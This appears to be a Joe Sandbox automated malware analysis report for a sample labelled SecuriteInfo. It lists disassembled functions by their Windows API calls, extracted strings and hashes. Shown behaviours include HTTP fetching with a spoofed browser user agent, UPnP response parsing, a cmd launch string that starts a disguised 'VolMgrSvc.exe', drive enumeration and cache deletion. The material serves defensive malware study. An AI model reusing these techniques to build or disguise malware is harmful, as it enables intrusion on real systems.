                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID:
                                                                                • API String ID: 439099756-0
                                                                                • Opcode ID: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 3956458805-0
                                                                                • Opcode ID: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID:
                                                                                • API String ID: 1457358591-0
                                                                                • Opcode ID: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • NoDrives, xrefs: 004063B8
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
